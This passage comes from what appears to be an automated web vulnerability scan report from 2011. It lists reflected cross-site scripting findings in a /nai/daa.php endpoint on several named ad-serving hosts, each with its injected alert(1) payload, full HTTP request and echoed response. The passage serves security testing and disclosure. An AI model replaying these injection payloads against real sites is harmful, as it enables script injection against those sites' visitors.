<link rel="canonical" href="http://nai.adserverwc.adtechus.com/naib3208"><script>alert(1)</script>48076e2b9f3/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.80. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8a91"-alert(1)-"51a1f740f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naia8a91"-alert(1)-"51a1f740f7/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS4560b095224b35103826c3de720914c2=c8444d72947a0b9d3c195d1fa58da987; expires=Tue, 06 Dec 2011 22:26:38 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naia8a91"-alert(1)-"51a1f740f7/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.81. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2132e"><script>alert(1)</script>24c07b93d3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php2132e"><script>alert(1)</script>24c07b93d3d?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS4560b095224b35103826c3de720914c2=52d1be77cd2960f9d100e99c60cecd50; expires=Tue, 06 Dec 2011 22:26:41 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverwc.adtechus.com/nai/daa.php2132e"><script>alert(1)</script>24c07b93d3d?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.82. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c38"-alert(1)-"1340355f8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php24c38"-alert(1)-"1340355f8c?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS4560b095224b35103826c3de720914c2=2b645f5d7e49ad9fd85a62beb24ebbc8; expires=Tue, 06 Dec 2011 22:26:45 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php24c38"-alert(1)-"1340355f8c?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.83. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbb4"-alert(1)-"0f493ee429a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai1dbb4"-alert(1)-"0f493ee429a/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSaa8d1be1c23fed9179d4afce8ffe57e1=6cac39a796f03cbbea6294fc7721dcb7; expires=Tue, 06 Dec 2011 22:26:37 GMT; path=/; domain=.nai.adsonar.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai1dbb4"-alert(1)-"0f493ee429a/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.84. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fec"><script>alert(1)</script>d3c475e93d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naic0fec"><script>alert(1)</script>d3c475e93d0/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSaa8d1be1c23fed9179d4afce8ffe57e1=6deb92764ae9708dfe3bc510f0f7073a; expires=Tue, 06 Dec 2011 22:26:32 GMT; path=/; domain=.nai.adsonar.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adsonar.com/naic0fec"><script>alert(1)</script>d3c475e93d0/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.85. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e065"><script>alert(1)</script>aba79a77d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php6e065"><script>alert(1)</script>aba79a77d0?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSaa8d1be1c23fed9179d4afce8ffe57e1=8557b4b6a7c71f988dfba6e8e54e4b02; expires=Tue, 06 Dec 2011 22:26:42 GMT; path=/; domain=.nai.adsonar.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adsonar.com/nai/daa.php6e065"><script>alert(1)</script>aba79a77d0?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.86. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79348"-alert(1)-"a575d16ea79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php79348"-alert(1)-"a575d16ea79?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSaa8d1be1c23fed9179d4afce8ffe57e1=96590984c5eb21203bc838d7c6dc7df0; expires=Tue, 06 Dec 2011 22:26:45 GMT; path=/; domain=.nai.adsonar.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php79348"-alert(1)-"a575d16ea79?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.87. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71316"-alert(1)-"8ac3a4c1b8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai71316"-alert(1)-"8ac3a4c1b8b/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSb206a97324cd72666995acbf3f28bc3c=8c250b335063e194b4cc3d5a540136d3; expires=Tue, 06 Dec 2011 22:26:38 GMT; path=/; domain=.nai.adtech.de
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai71316"-alert(1)-"8ac3a4c1b8b/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.88. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2adba"><script>alert(1)</script>084374f905c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai2adba"><script>alert(1)</script>084374f905c/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSb206a97324cd72666995acbf3f28bc3c=07a45a2331079a584d02c471a081e116; expires=Tue, 06 Dec 2011 22:26:34 GMT; path=/; domain=.nai.adtech.de
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adtech.de/nai2adba"><script>alert(1)</script>084374f905c/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.89. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee25"><script>alert(1)</script>c34d725d54b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php1ee25"><script>alert(1)</script>c34d725d54b?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSb206a97324cd72666995acbf3f28bc3c=b3baa72e44fc859a04edbea3fbd13554; expires=Tue, 06 Dec 2011 22:26:42 GMT; path=/; domain=.nai.adtech.de
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adtech.de/nai/daa.php1ee25"><script>alert(1)</script>c34d725d54b?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.90. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec964"-alert(1)-"cbd9494c35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpec964"-alert(1)-"cbd9494c35?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSb206a97324cd72666995acbf3f28bc3c=703362d88692ab2d8274fb39c57fa8be; expires=Tue, 06 Dec 2011 22:26:45 GMT; path=/; domain=.nai.adtech.de
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpec964"-alert(1)-"cbd9494c35?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.91. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0cc1"><script>alert(1)</script>4a6c0eee10d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

